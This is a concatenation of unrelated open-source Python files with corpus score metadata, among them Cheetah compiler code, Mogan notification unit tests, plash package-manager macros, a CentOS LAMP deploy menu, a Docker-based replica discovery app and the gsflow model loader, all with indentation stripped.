if self.setting('handlerForExtendsDirective'):
handler = self.setting('handlerForExtendsDirective')
baseClassName = handler(compiler=self, baseClassName=baseClassName)
self._getActiveClassCompiler().setBaseClass(baseClassName)
elif (not self.setting('autoImportForExtendsDirective')
or baseClassName=='object' or baseClassName in self.importedVarNames()):
self._getActiveClassCompiler().setBaseClass(baseClassName)
# no need to import
else:
##################################################
## If the #extends directive contains a classname or modulename that isn't
# in self.importedVarNames() already, we assume that we need to add
# an implied 'from ModName import ClassName' where ModName == ClassName.
# - This is the case in WebKit servlet modules.
# - We also assume that the final . separates the classname from the
# module name. This might break if people do something really fancy
# with their dots and namespaces.
chunks = baseClassName.split('.')
if len(chunks)==1:
self._getActiveClassCompiler().setBaseClass(baseClassName)
if baseClassName not in self.importedVarNames():
modName = baseClassName
# we assume the class name to be the module name
# and that it's not a builtin:
importStatement = "from %s import %s" % (modName, baseClassName)
self.addImportStatement(importStatement)
self.addImportedVarNames( [baseClassName,] )
else:
needToAddImport = True
modName = chunks[0]
#print chunks, ':', self.importedVarNames()
for chunk in chunks[1:-1]:
if modName in self.importedVarNames():
needToAddImport = False
finalBaseClassName = baseClassName.replace(modName+'.', '')
self._getActiveClassCompiler().setBaseClass(finalBaseClassName)
break
else:
modName += '.'+chunk
if needToAddImport:
modName, finalClassName = '.'.join(chunks[:-1]), chunks[-1]
#if finalClassName != chunks[:-1][-1]:
if finalClassName != chunks[-2]:
# we assume the class name to be the module name
modName = '.'.join(chunks)
self._getActiveClassCompiler().setBaseClass(finalClassName)
importStatement = "from %s import %s" % (modName, finalClassName)
self.addImportStatement(importStatement)
self.addImportedVarNames( [finalClassName,] )
def setCompilerSetting(self, key, valueExpr):
self.setSetting(key, eval(valueExpr) )
self._parser.configureParser()
def setCompilerSettings(self, keywords, settingsStr):
KWs = keywords
merge = True
if 'nomerge' in KWs:
merge = False
if 'reset' in KWs:
# @@TR: this is actually caught by the parser at the moment.
# subject to change in the future
self._initializeSettings()
self._parser.configureParser()
return
elif 'python' in KWs:
settingsReader = self.updateSettingsFromPySrcStr
# this comes from SettingsManager
else:
# this comes from SettingsManager
settingsReader = self.updateSettingsFromConfigStr
settingsReader(settingsStr)
self._parser.configureParser()
def setShBang(self, shBang):
self._moduleShBang = shBang
def setModuleEncoding(self, encoding):
self._moduleEncoding = encoding
self._moduleEncodingStr = '# -*- coding: %s -*-' %encoding
def getModuleEncoding(self):
return self._moduleEncoding
def addModuleHeader(self, line):
"""Adds a header comment to the top of the generated module.
"""
self._moduleHeaderLines.append(line)
def addModuleDocString(self, line):
"""Adds a line to the generated module docstring.
"""
self._moduleDocStringLines.append(line)
def addModuleGlobal(self, line):
"""Adds a line of global module code. It is inserted after the import
statements and Cheetah default module constants.
"""
self._moduleConstants.append(line)
def addSpecialVar(self, basename, contents, includeUnderscores=True):
"""Adds module __specialConstant__ to the module globals.
"""
name = includeUnderscores and '__'+basename+'__' or basename
self._specialVars[name] = contents.strip()
def addImportStatement(self, impStatement):
self._importStatements.append(impStatement)
#@@TR 2005-01-01: there's almost certainly a cleaner way to do this!
importVarNames = impStatement[impStatement.find('import') + len('import'):].split(',')
importVarNames = [var.split()[-1] for var in importVarNames] # handles aliases
importVarNames = [var for var in importVarNames if var!='*']
self.addImportedVarNames(importVarNames) #used by #extend for auto-imports
def addAttribute(self, attribName, expr):
self._getActiveClassCompiler().addAttribute(attribName + ' =' + expr)
def addComment(self, comm):
if re.match(r'#+$',comm): # skip bar comments
return
specialVarMatch = specialVarRE.match(comm)
if specialVarMatch:
# @@TR: this is a bit hackish and is being replaced with
# #set module varName = ...
return self.addSpecialVar(specialVarMatch.group(1),
comm[specialVarMatch.end():])
elif comm.startswith('doc:'):
addLine = self.addMethDocString
comm = comm[len('doc:'):].strip()
elif comm.startswith('doc-method:'):
addLine = self.addMethDocString
comm = comm[len('doc-method:'):].strip()
elif comm.startswith('doc-module:'):
addLine = self.addModuleDocString
comm = comm[len('doc-module:'):].strip()
elif comm.startswith('doc-class:'):
addLine = self.addClassDocString
comm = comm[len('doc-class:'):].strip()
elif comm.startswith('header:'):
addLine = self.addModuleHeader
comm = comm[len('header:'):].strip()
else:
addLine = self.addMethComment
for line in comm.splitlines():
addLine(line)
## methods for module code wrapping
def getModuleCode(self):
if not self._compiled:
self.compile()
if self._moduleDef:
return self._moduleDef
else:
return self.wrapModuleDef()
__str__ = getModuleCode
def wrapModuleDef(self):
self.addSpecialVar('CHEETAH_docstring', self.setting('defDocStrMsg'))
self.addModuleGlobal('__CHEETAH_version__ = %r'%Version)
self.addModuleGlobal('__CHEETAH_versionTuple__ = %r'%(VersionTuple,))
self.addModuleGlobal('__CHEETAH_genTime__ = %r'%time.time())
self.addModuleGlobal('__CHEETAH_genTimestamp__ = %r'%self.timestamp())
if self._filePath:
timestamp = self.timestamp(self._fileMtime)
self.addModuleGlobal('__CHEETAH_src__ = %r'%self._filePath)
self.addModuleGlobal('__CHEETAH_srcLastModified__ = %r'%timestamp)
else:
self.addModuleGlobal('__CHEETAH_src__ = None')
self.addModuleGlobal('__CHEETAH_srcLastModified__ = None')
moduleDef = """%(header)s
%(docstring)s
##################################################
## DEPENDENCIES
%(imports)s
##################################################
## MODULE CONSTANTS
%(constants)s
%(specialVars)s
if __CHEETAH_versionTuple__ < RequiredCheetahVersionTuple:
raise AssertionError(
'This template was compiled with Cheetah version'
' %%s. Templates compiled before version %%s must be recompiled.'%%(
__CHEETAH_version__, RequiredCheetahVersion))
##################################################
## CLASSES
%(classes)s
## END CLASS DEFINITION
if not hasattr(%(mainClassName)s, '_initCheetahAttributes'):
templateAPIClass = getattr(%(mainClassName)s, '_CHEETAH_templateClass', Template)
templateAPIClass._addCheetahPlumbingCodeToClass(%(mainClassName)s)
%(footer)s
""" % {'header':self.moduleHeader(),
'docstring':self.moduleDocstring(),
'specialVars':self.specialVars(),
'imports':self.importStatements(),
'constants':self.moduleConstants(),
'classes':self.classDefs(),
'footer':self.moduleFooter(),
'mainClassName':self._mainClassName,
}
self._moduleDef = moduleDef
return moduleDef
def timestamp(self, theTime=None):
if not theTime:
theTime = time.time()
return time.asctime(time.localtime(theTime))
def moduleHeader(self):
header = self._moduleShBang + '\n'
header += self._moduleEncodingStr + '\n'
if self._moduleHeaderLines:
offSet = self.setting('commentOffset')
header += (
'#' + ' '*offSet +
('\n#'+ ' '*offSet).join(self._moduleHeaderLines) + '\n')
return header
def moduleDocstring(self):
if not self._moduleDocStringLines:
return ''
return ('"""' +
'\n'.join(self._moduleDocStringLines) +
'\n"""\n')
def specialVars(self):
chunks = []
theVars = self._specialVars
keys = theVars.keys()
keys.sort()
for key in keys:
chunks.append(key + ' = ' + repr(theVars[key]) )
return '\n'.join(chunks)
def importStatements(self):
return '\n'.join(self._importStatements)
def moduleConstants(self):
return '\n'.join(self._moduleConstants)
def classDefs(self):
classDefs = [str(klass) for klass in self._finishedClasses() ]
return '\n\n'.join(classDefs)
def moduleFooter(self):
return """
# CHEETAH was developed by <NAME> and <NAME>
# with code, advice and input from many other volunteers.
# For more information visit http://www.CheetahTemplate.org/
##################################################
## if run from command line:
if __name__ == '__main__':
from Cheetah.TemplateCmdLineIface import CmdLineIface
CmdLineIface(templateObj=%(className)s()).run()
""" % {'className':self._mainClassName}
##################################################
## Make Compiler an alias for ModuleCompiler
Compiler = ModuleCompiler
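# Minimal usage sketch (assumption; mirrors how Cheetah.Template drives this
# module, assuming the standard 'Cheetah.Compiler' package layout):
#
#     from Cheetah.Compiler import Compiler
#     py_src = str(Compiler(source="Hello $name!", moduleName='Hello'))
#     # py_src now holds the generated module code returned by getModuleCode()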
| 2.453125 | 2 |
tests/simple_cmd_checks.py | Rhoynar/plmn-regression | 11 | 11317 | <filename>tests/simple_cmd_checks.py
# -*- coding: utf-8 -*-
import compat
import unittest
import sys
from plmn.utils import *
from plmn.results import *
from plmn.modem_cmds import *
from plmn.simple_cmds import *
class SimpleCmdChecks(unittest.TestCase):
def test_simple_status_cmd(self):
SimpleCmds.simple_status_cmd()
assert Results.get_state('Simple Status') is not None
def test_simple_status_get_reg_status(self):
SimpleCmds.simple_status_get_reg_status()
def test_simple_status_is_registered(self):
assert SimpleCmds.simple_status_is_registered() is True
def test_simple_status_is_home(self):
assert SimpleCmds.simple_status_is_home() is True
assert SimpleCmds.simple_status_is_roaming() is False
@unittest.skip('Skipping this test since this is only applicable in connected state')
def test_simple_status_is_connected(self):
assert SimpleCmds.simple_status_is_connected() is True
@unittest.skip('Skipping this as this is only applicable for Roaming scenario')
def test_simple_status_is_roaming(self):
assert SimpleCmds.simple_status_is_roaming() is True
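# Note (assumption): these checks expect a modem that is registered on its home
# network; running the module directly, e.g. `python simple_cmd_checks.py`, lets
# process_args() consume any framework-specific flags before unittest takes over.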
if __name__ == '__main__':
nargs = process_args()
unittest.main(argv=sys.argv[nargs:], exit=False)
Results.print_results()
| 2.578125 | 3 |
mogan/tests/unit/notifications/test_notification.py | GURUIFENG9139/rocky-mogan | 0 | 11318 | # All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import collections
import mock
from oslo_versionedobjects import fixture as object_fixture
from mogan.notifications import base as notification_base
from mogan.notifications.objects import base as notification
from mogan.objects import base
from mogan.objects import fields
from mogan.objects import server as server_obj
from mogan.tests import base as test_base
from mogan.tests.unit.db import utils as db_utils
class TestNotificationBase(test_base.TestCase):
@base.MoganObjectRegistry.register_if(False)
class TestObject(base.MoganObject):
VERSION = '1.0'
fields = {
'field_1': fields.StringField(),
'field_2': fields.IntegerField(),
'not_important_field': fields.IntegerField(),
}
@base.MoganObjectRegistry.register_if(False)
class TestNotificationPayload(notification.NotificationPayloadBase):
VERSION = '1.0'
SCHEMA = {
'field_1': ('source_field', 'field_1'),
'field_2': ('source_field', 'field_2'),
}
fields = {
'extra_field': fields.StringField(), # filled by ctor
'field_1': fields.StringField(), # filled by the schema
'field_2': fields.IntegerField(), # filled by the schema
}
def populate_schema(self, source_field):
super(TestNotificationBase.TestNotificationPayload,
self).populate_schema(source_field=source_field)
@base.MoganObjectRegistry.register_if(False)
class TestNotificationPayloadEmptySchema(
notification.NotificationPayloadBase):
VERSION = '1.0'
fields = {
'extra_field': fields.StringField(), # filled by ctor
}
@notification.notification_sample('test-update-1.json')
@notification.notification_sample('test-update-2.json')
@base.MoganObjectRegistry.register_if(False)
class TestNotification(notification.NotificationBase):
VERSION = '1.0'
fields = {
'payload': fields.ObjectField('TestNotificationPayload')
}
@base.MoganObjectRegistry.register_if(False)
class TestNotificationEmptySchema(notification.NotificationBase):
VERSION = '1.0'
fields = {
'payload': fields.ObjectField('TestNotificationPayloadEmptySchema')
}
expected_payload = {
'mogan_object.name': 'TestNotificationPayload',
'mogan_object.data': {
'extra_field': 'test string',
'field_1': 'test1',
'field_2': 42},
'mogan_object.version': '1.0',
'mogan_object.namespace': 'mogan'}
def setUp(self):
super(TestNotificationBase, self).setUp()
self.my_obj = self.TestObject(field_1='test1',
field_2=42,
not_important_field=13)
self.payload = self.TestNotificationPayload(
extra_field='test string')
self.payload.populate_schema(source_field=self.my_obj)
self.notification = self.TestNotification(
event_type=notification.EventType(
object='test_object',
action=fields.NotificationAction.UPDATE,
phase=fields.NotificationPhase.START),
publisher=notification.NotificationPublisher(
host='fake-host', binary='mogan-fake'),
priority=fields.NotificationPriority.INFO,
payload=self.payload)
def _verify_notification(self, mock_notifier, mock_context,
expected_event_type,
expected_payload):
mock_notifier.prepare.assert_called_once_with(
publisher_id='mogan-fake:fake-host')
mock_notify = mock_notifier.prepare.return_value.info
self.assertTrue(mock_notify.called)
self.assertEqual(mock_notify.call_args[0][0], mock_context)
self.assertEqual(mock_notify.call_args[1]['event_type'],
expected_event_type)
actual_payload = mock_notify.call_args[1]['payload']
self.assertJsonEqual(expected_payload, actual_payload)
@mock.patch('mogan.common.rpc.NOTIFIER')
def test_emit_notification(self, mock_notifier):
mock_context = mock.Mock()
mock_context.to_dict.return_value = {}
self.notification.emit(mock_context)
self._verify_notification(
mock_notifier,
mock_context,
expected_event_type='test_object.update.start',
expected_payload=self.expected_payload)
@mock.patch('mogan.common.rpc.NOTIFIER')
def test_emit_with_host_and_binary_as_publisher(self, mock_notifier):
noti = self.TestNotification(
event_type=notification.EventType(
object='test_object',
action=fields.NotificationAction.UPDATE),
publisher=notification.NotificationPublisher(
host='fake-host', binary='mogan-fake'),
priority=fields.NotificationPriority.INFO,
payload=self.payload)
mock_context = mock.Mock()
mock_context.to_dict.return_value = {}
noti.emit(mock_context)
self._verify_notification(
mock_notifier,
mock_context,
expected_event_type='test_object.update',
expected_payload=self.expected_payload)
@mock.patch('mogan.common.rpc.NOTIFIER')
def test_emit_event_type_without_phase(self, mock_notifier):
noti = self.TestNotification(
event_type=notification.EventType(
object='test_object',
action=fields.NotificationAction.UPDATE),
publisher=notification.NotificationPublisher(
host='fake-host', binary='mogan-fake'),
priority=fields.NotificationPriority.INFO,
payload=self.payload)
mock_context = mock.Mock()
mock_context.to_dict.return_value = {}
noti.emit(mock_context)
self._verify_notification(
mock_notifier,
mock_context,
expected_event_type='test_object.update',
expected_payload=self.expected_payload)
@mock.patch('mogan.common.rpc.NOTIFIER')
def test_not_possible_to_emit_if_not_populated(self, mock_notifier):
non_populated_payload = self.TestNotificationPayload(
extra_field='test string')
noti = self.TestNotification(
event_type=notification.EventType(
object='test_object',
action=fields.NotificationAction.UPDATE),
publisher=notification.NotificationPublisher(
host='fake-host', binary='mogan-fake'),
priority=fields.NotificationPriority.INFO,
payload=non_populated_payload)
mock_context = mock.Mock()
self.assertRaises(AssertionError, noti.emit, mock_context)
mock_notifier.assert_not_called()
@mock.patch('mogan.common.rpc.NOTIFIER')
def test_empty_schema(self, mock_notifier):
non_populated_payload = self.TestNotificationPayloadEmptySchema(
extra_field='test string')
noti = self.TestNotificationEmptySchema(
event_type=notification.EventType(
object='test_object',
action=fields.NotificationAction.UPDATE),
publisher=notification.NotificationPublisher(
host='fake-host', binary='mogan-fake'),
priority=fields.NotificationPriority.INFO,
payload=non_populated_payload)
mock_context = mock.Mock()
mock_context.to_dict.return_value = {}
noti.emit(mock_context)
self._verify_notification(
mock_notifier,
mock_context,
expected_event_type='test_object.update',
expected_payload={
'mogan_object.name': 'TestNotificationPayloadEmptySchema',
'mogan_object.data': {'extra_field': u'test string'},
'mogan_object.version': '1.0',
'mogan_object.namespace': 'mogan'})
def test_sample_decorator(self):
self.assertEqual(2, len(self.TestNotification.samples))
self.assertIn('test-update-1.json', self.TestNotification.samples)
self.assertIn('test-update-2.json', self.TestNotification.samples)
notification_object_data = {
'ServerPayload': '1.0-30fefa8478f1b9b35c66868377fb6dfd',
'ServerAddressesPayload': '1.0-69caf4c36f36756bb1f6970d093ee1f6',
'ServerActionPayload': '1.0-8dc4429afa34d86ab92c9387e3ccd0c3',
'ServerActionNotification': '1.0-20087e599436bd9db62ae1fb5e2dfef2',
'ExceptionPayload': '1.0-7c31986d8d78bed910c324965c431e18',
'EventType': '1.0-589894aac7c98fb640eca394f67ad621',
'NotificationPublisher': '1.0-4b0b0d662b21eeed0b23617f3f11794b'
}
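# The fixture below compares these fingerprints against the currently registered
# notification classes. A minimal sketch of the idea (mirroring the test code
# that follows, names as defined there):
#
#     checker = object_fixture.ObjectVersionChecker(obj_classes=classes)
#     expect, actual = checker.test_hashes(notification_object_data)
#     # expect == actual unless an object changed without a version bump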
class TestNotificationObjectVersions(test_base.TestCase):
def setUp(self):
super(test_base.TestCase, self).setUp()
base.MoganObjectRegistry.register_notification_objects()
def test_versions(self):
noti_class = base.MoganObjectRegistry.notification_classes
classes = {cls.__name__: [cls] for cls in noti_class}
checker = object_fixture.ObjectVersionChecker(obj_classes=classes)
# Compute the difference between actual fingerprints and
# expect fingerprints. expect = actual = {} if there is no change.
expect, actual = checker.test_hashes(notification_object_data)
self.assertEqual(expect, actual,
"Some objects fields or remotable methods have been "
"modified. Please make sure the version of those "
"objects have been bumped and then update "
"expected_object_fingerprints with the new hashes. ")
def test_notification_payload_version_depends_on_the_schema(self):
@base.MoganObjectRegistry.register_if(False)
class TestNotificationPayload(notification.NotificationPayloadBase):
VERSION = '1.0'
SCHEMA = {
'field_1': ('source_field', 'field_1'),
'field_2': ('source_field', 'field_2'),
}
fields = {
'extra_field': fields.StringField(), # filled by ctor
'field_1': fields.StringField(), # filled by the schema
'field_2': fields.IntegerField(), # filled by the schema
}
checker = object_fixture.ObjectVersionChecker(
{'TestNotificationPayload': (TestNotificationPayload,)})
old_hash = checker.get_hashes(extra_data_func=get_extra_data)
TestNotificationPayload.SCHEMA['field_3'] = ('source_field',
'field_3')
new_hash = checker.get_hashes(extra_data_func=get_extra_data)
self.assertNotEqual(old_hash, new_hash)
def get_extra_data(obj_class):
extra_data = tuple()
# Get the SCHEMA items to add to the fingerprint
# if we are looking at a notification
if issubclass(obj_class, notification.NotificationPayloadBase):
schema_data = collections.OrderedDict(
sorted(obj_class.SCHEMA.items()))
extra_data += (schema_data,)
return extra_data
class TestServerActionNotification(test_base.TestCase):
@mock.patch('mogan.notifications.objects.server.'
'ServerActionNotification._emit')
def test_send_version_server_action(self, mock_emit):
# Make sure that the notification payload chooses the values in
# server.flavor.$value instead of server.$value
fake_server_values = db_utils.get_test_server()
server = server_obj.Server(**fake_server_values)
notification_base.notify_about_server_action(
mock.MagicMock(),
server,
'test-host',
fields.NotificationAction.CREATE,
fields.NotificationPhase.START,
'mogan-compute')
self.assertEqual('server.create.start',
mock_emit.call_args_list[0][1]['event_type'])
self.assertEqual('mogan-compute:test-host',
mock_emit.call_args_list[0][1]['publisher_id'])
payload = mock_emit.call_args_list[0][1]['payload'][
'mogan_object.data']
self.assertEqual(fake_server_values['uuid'], payload['uuid'])
self.assertEqual(fake_server_values['flavor_uuid'],
payload['flavor_uuid'])
self.assertEqual(fake_server_values['status'], payload['status'])
self.assertEqual(fake_server_values['user_id'], payload['user_id'])
self.assertEqual(fake_server_values['availability_zone'],
payload['availability_zone'])
self.assertEqual(fake_server_values['name'], payload['name'])
self.assertEqual(fake_server_values['image_uuid'],
payload['image_uuid'])
self.assertEqual(fake_server_values['project_id'],
payload['project_id'])
self.assertEqual(fake_server_values['description'],
payload['description'])
self.assertEqual(fake_server_values['power_state'],
payload['power_state'])
| 1.890625 | 2 |
plash/macros/packagemanagers.py | 0xflotus/plash | 0 | 11319 | from plash.eval import eval, register_macro, shell_escape_args
@register_macro()
def defpm(name, *lines):
'define a new package manager'
@register_macro(name, group='package managers')
@shell_escape_args
def package_manager(*packages):
if not packages:
return
sh_packages = ' '.join(pkg for pkg in packages)
expanded_lines = [line.format(sh_packages) for line in lines]
return eval([['run'] + expanded_lines])
package_manager.__doc__ = "install packages with {}".format(name)
eval([[
'defpm',
'apt',
'apt-get update',
'apt-get install -y {}',
], [
'defpm',
'add-apt-repository',
'apt-get install software-properties-common',
'run add-apt-repository -y {}',
], [
'defpm',
'apk',
'apk update',
'apk add {}',
], [
'defpm',
'yum',
'yum install -y {}',
], [
'defpm',
'dnf',
'dnf install -y {}',
], [
'defpm',
'pip',
'pip install {}',
], [
'defpm',
'pip3',
'pip3 install {}',
], [
'defpm',
'npm',
'npm install -g {}',
], [
'defpm',
'pacman',
'pacman -Sy --noconfirm {}',
], [
'defpm',
'emerge',
'emerge {}',
]])
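# Minimal sketch (added for illustration; not part of the original plash source):
# reproduce the line expansion that a generated package-manager macro performs,
# without calling eval() or touching the system. Package names are hypothetical.
if __name__ == '__main__':
    packages = ['git', 'curl']
    sh_packages = ' '.join(packages)
    lines = ['apt-get update', 'apt-get install -y {}']
    print([line.format(sh_packages) for line in lines])
    # -> ['apt-get update', 'apt-get install -y git curl']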
| 1.84375 | 2 |
app/schemas/email.py | waynesun09/notify-service | 5 | 11320 | <reponame>waynesun09/notify-service
from typing import Optional, List
from pydantic import BaseModel, EmailStr
from . import result
class EmailBase(BaseModel):
email: Optional[EmailStr] = None
class EmailSend(EmailBase):
msg: str
class EmailResult(BaseModel):
pre_header: Optional[str] = None
begin: Optional[str] = None
content: List[result.Result]
end: Optional[str] = None
| 2.328125 | 2 |
example.py | ErikPel/rankedchoicevoting | 1 | 11321 | <filename>example.py
from rankedchoicevoting import Poll
candidatesA = {"Bob": 0, "Sue": 0, "Bill": 0}
#votes in array sorted by first choice to last choice
votersA = {
"a": ['Bob', 'Bill', 'Sue'],
"b": ['Sue', 'Bob', 'Bill'],
"c": ['Bill', 'Sue', 'Bob'],
"d": ['Bob', 'Bill', 'Sue'],
"f": ['Sue', 'Bob', 'Bill']
}
election = Poll(candidatesA,votersA)
election.addCandidate("Joe", 0)
election.addVoter("g",['Joe','Bob'])
print("Winner: " + election.getPollResults())
| 3.5625 | 4 |
DeployScript.py | junoteam/TelegramBot | 3 | 11322 | <reponame>junoteam/TelegramBot<gh_stars>1-10
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# -*- author: Alex -*-
from Centos6_Bit64 import *
from SystemUtils import *
# Checking version of OS should happened before menu appears
# Check version of CentOS
SystemUtils.check_centos_version()
# Clear screen before to show menu
os.system('clear')
answer = True
while answer:
print ("""
LAMP Deploy Script V: 0.1 for CentOS 6.5/6.6 64Bit:
---------------------------------------------------
1. Check version of your CentOS
2. Check Internet connection
3. Show me my local IP address
4. Open port 80 to Web
5. Show me my localhost name
------- LAMP for CentOS 6.x -----------
6. Install EPEL & IUS repository
7. Install Web Server - Apache
8. Install Database - MySQL
9. Install Language - PHP
10. Install LAMP in "One Click" - CentOS 6.x
11. Exit/Quit
""")
answer = input("Please make your choice: ")
if answer == 1:
os.system('clear')
print ('\nChecking version of the system: ')
SystemUtils.check_centos_version()
elif answer == 2:
os.system('clear')
print ('\nChecking if you connected to the Internet')
SystemUtils.check_internet_connection()
elif answer == 3:
os.system('clear')
print ('\nYour local IP address is: ' + SystemUtils.check_local_ip())
elif answer == 4:
os.system('clear')
print('\nChecking firewall')
Centos6Deploy.iptables_port()
elif answer == 5:
print "Checking local hostname..."
SystemUtils.check_host_name()
elif answer == 6:
print ('\nInstalling EPEL and IUS repository to the system...')
Centos6Deploy.add_repository()
elif answer == 7:
print ('\nInstalling Web Server Apache...')
Centos6Deploy.install_apache()
elif answer == 8:
print ('\nInstalling database MySQL...')
Centos6Deploy.install_mysql()
elif answer == 9:
print('\nInstalling PHP...')
Centos6Deploy.install_php()
elif answer == 10:
print ('Install LAMP in "One Click" - CentOS 6.x')
Centos6Deploy.iptables_port()
        Centos6Deploy.add_repository()
        Centos6Deploy.install_apache()
        Centos6Deploy.install_mysql()
        Centos6Deploy.install_php()
elif answer == 11:
print("\nGoodbye...\n")
answer = None
else:
print ('\nNot valid Choice, Try Again')
answer = True | 2.28125 | 2 |
distributed/register/application.py | ADKosm/concurrency | 0 | 11323 | <reponame>ADKosm/concurrency<filename>distributed/register/application.py
import asyncio
import os
import time
from dataclasses import dataclass
import requests_unixsocket
from aiohttp import ClientSession, web
@dataclass(frozen=True)
class Replica:
replica_id: str
ip: str
is_self: bool
def replicas_discovery():
session = requests_unixsocket.Session()
number_of_replicas = int(os.environ['REPLICAS'])
app_codename = os.environ['APP_CODENAME']
self_hostname = os.environ['HOSTNAME']
registered_replicas = set()
while len(registered_replicas) < number_of_replicas:
cluster_config = session.get('http+unix://%2Fvar%2Frun%2Fdocker.sock/v1.24/containers/json').json()
replicas = {
Replica(
replica_id=x['Id'],
ip=x['NetworkSettings']['Networks']['register_default']['IPAddress'],
is_self=x['Id'].startswith(self_hostname)
)
for x in cluster_config
if app_codename in x['Labels']
}
registered_replicas.update(replicas)
if len(registered_replicas) < number_of_replicas:
time.sleep(2)
return registered_replicas
replicas = replicas_discovery()
self_id = next(filter(lambda x: x.is_self, replicas)).replica_id
async def index(request):
for replica in replicas:
async with ClientSession() as session:
async with session.get("http://{}:8080/hello".format(replica.ip), headers={'ReplicaId': self_id}) as r:
await r.text()
return web.Response(text='ok')
# print(r.headers['ReplicaId'], flush=True)
async def hello(request):
requested_id = request.headers['ReplicaId']
print("Hello from {}".format(requested_id), flush=True)
return web.Response(text='ok')
print(replicas, flush=True)
app = web.Application()
app.add_routes([web.get('/', index),
web.get('/hello', hello)])
web.run_app(app, host='0.0.0.0', port=8080)
| 2.546875 | 3 |
setup.py | greenaddress/txjsonrpc | 0 | 11324 | <gh_stars>0
from __future__ import absolute_import
from setuptools import setup
from txjsonrpc import meta
from txjsonrpc.util import dist
setup(
name=meta.display_name,
version=meta.version,
description=meta.description,
author=meta.author,
author_email=meta.author_email,
url=meta.url,
license=meta.license,
packages=dist.findPackages(meta.library_name),
long_description=dist.catReST(
"docs/PRELUDE.txt",
"README",
"docs/DEPENDENCIES.txt",
"docs/INSTALL.txt",
"docs/USAGE.txt",
"TODO",
"docs/HISTORY.txt",
stop_on_errors=True,
out=True),
classifiers=[
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"Programming Language :: Python",
],
)
| 1.265625 | 1 |
gsflow/gsflow.py | pygsflow/pygsflow | 17 | 11325 | <reponame>pygsflow/pygsflow<gh_stars>10-100
# -*- coding: utf-8 -*-
import os
from .control import ControlFile
from .prms import PrmsModel
from .utils import gsflow_io, GsConstant
from .prms import Helper
from .modflow import Modflow
from .modsim import Modsim
import flopy
import subprocess as sp
import platform
import warnings
warnings.simplefilter("always", PendingDeprecationWarning)
warnings.simplefilter("always", UserWarning)
class GsflowModel(object):
"""
GsflowModel is the GSFLOW model object. This class can be used
to build a GSFLOW model, to load a GSFLOW model from it's control file,
to write input files for GSFLOW and to run GSFLOW.
Parameters
----------
control_file : str
control file path and name
prms : PrmsModel object
gsflow.prms.PrmsModel
mf : Modflow object
gsflow.modflow.Modflow
modflow_only : bool
flag that indicates only Modflow model
prms_only : bool
flag that indicates only PRMS model
gsflow_exe : str
GSFLOW executable path and name
modsim : bool
boolean flag to indicate that modsim is active
this creates a gsflow.modsim.Modsim object
model_ws : str, None
override method to set the base model directory when the
GSFLOW control file is not located in the same directory as
the script to run GSFLOW
Examples
--------
load from control file
>>> import gsflow
>>> gsf = gsflow.GsflowModel.load_from_file("gsflow.control")
create new, empty gsflow object
>>> control = gsflow.ControlFile(records_list=[])
>>> gsf = gsflow.GsflowModel(control=control)
"""
def __init__(
self,
control=None,
prms=None,
mf=None,
modflow_only=False,
prms_only=False,
gsflow_exe=None,
modsim=False,
model_ws=None,
):
if not isinstance(control, ControlFile):
raise ValueError("control must be a ControlFile object")
self.control = control
self.control_file = os.path.abspath(control.control_file)
self.ws = None
self._modflow_only = modflow_only
self._prms_only = prms_only
self.prms = None
self.mf = None
self.modsim = None
self.gsflow_exe = gsflow_exe
if gsflow_exe is None:
self.gsflow_exe = os.path.join(
os.path.dirname(__file__), r"bin\gsflow.exe"
)
# set prms object
if not modflow_only:
if prms and isinstance(prms, PrmsModel):
self.prms = prms
else:
err = "prms is not a PrmsModel object, skipping..."
warnings.warn(err, UserWarning)
# set flopy modflow object
if not prms_only:
if mf and isinstance(mf, flopy.modflow.Modflow):
self.mf = mf
namefile = os.path.basename(
control.get_values("modflow_name")[0]
)
if namefile is not None:
self.mf.namefile = namefile
else:
err = "modflow is not a gsflow.modflow.Modflow object, skipping..."
warnings.warn(err, UserWarning)
if modsim:
self.modsim = Modsim(self)
self.help = Helper()
@property
def modflow_only(self):
"""
Returns
-------
bool
"""
return self._modflow_only
@property
def prms_only(self):
"""
Returns
-------
bool
"""
return self._prms_only
def export_nc(self, f, **kwargs):
"""
Method to export the GSFLOW model as a netcdf
file. This method only works if nhru is equivalent
to nrow * ncol in modflow.
Parameters
----------
f : str
netcdf file name
kwargs :
keyword arguments for netcdf
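        Examples
        --------
        A minimal sketch (assumes a loaded model where nhru equals nrow * ncol;
        the output file name here is illustrative):
        >>> gsf = gsflow.GsflowModel.load_from_file("gsflow.control")
        >>> gsf.export_nc("gsflow_model.nc")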
"""
if not f.endswith(".nc"):
raise AssertionError("f must end with .nc extension")
if self.mf is None:
err = "Modflow object must be loaded to export netcdf file"
raise AssertionError(err)
f = self.mf.export(f, **kwargs)
if self.prms is not None:
f = self.prms.export_nc(f, self.mf, **kwargs)
return f
@staticmethod
def load_from_file(
control_file,
gsflow_exe="gsflow.exe",
modflow_only=False,
prms_only=False,
mf_load_only=None,
forgive=False,
model_ws=None,
):
"""
Method to load a gsflow model from it's control file
Parameters
----------
control_file : str
control file path & name, GSFLOW
gsflow_exe : str
gsflow executable path & name
modflow_only : bool
flag to load only modflow from the control file
prms_only : bool
flag to load only prms from the control file
mf_load_only : list
list of packages to load from modflow ex. [DIS, BAS, LPF]
forgive : bool
forgive file loading errors in flopy
model_ws : str, None
override method to set the base model directory when the
GSFLOW control file is not located in the same directory as
the script to run GSFLOW
Returns
-------
GsflowModel object
Examples
--------
>>> import gsflow
>>> gsf = gsflow.GsflowModel.load_from_file("gsflow.control")
"""
prms = None
modflow = None
modsim = False
if not (os.path.isfile(control_file)):
raise ValueError("Cannot find control file")
if model_ws is not None:
control = ControlFile.load_from_file(control_file, abs_path=False)
else:
control = ControlFile.load_from_file(control_file)
print("Control file is loaded")
mode = control.get_values("model_mode")[0].upper()
if mode == "MODFLOW":
modflow_only = True
elif mode == "PRMS":
prms_only = True
elif "MODSIM" in mode:
modsim = True
else:
pass
# load prms
if not modflow_only:
print("Working on loading PRMS model ...")
prms = PrmsModel.load_from_file(control_file, model_ws=model_ws)
if not prms_only:
# get model mode
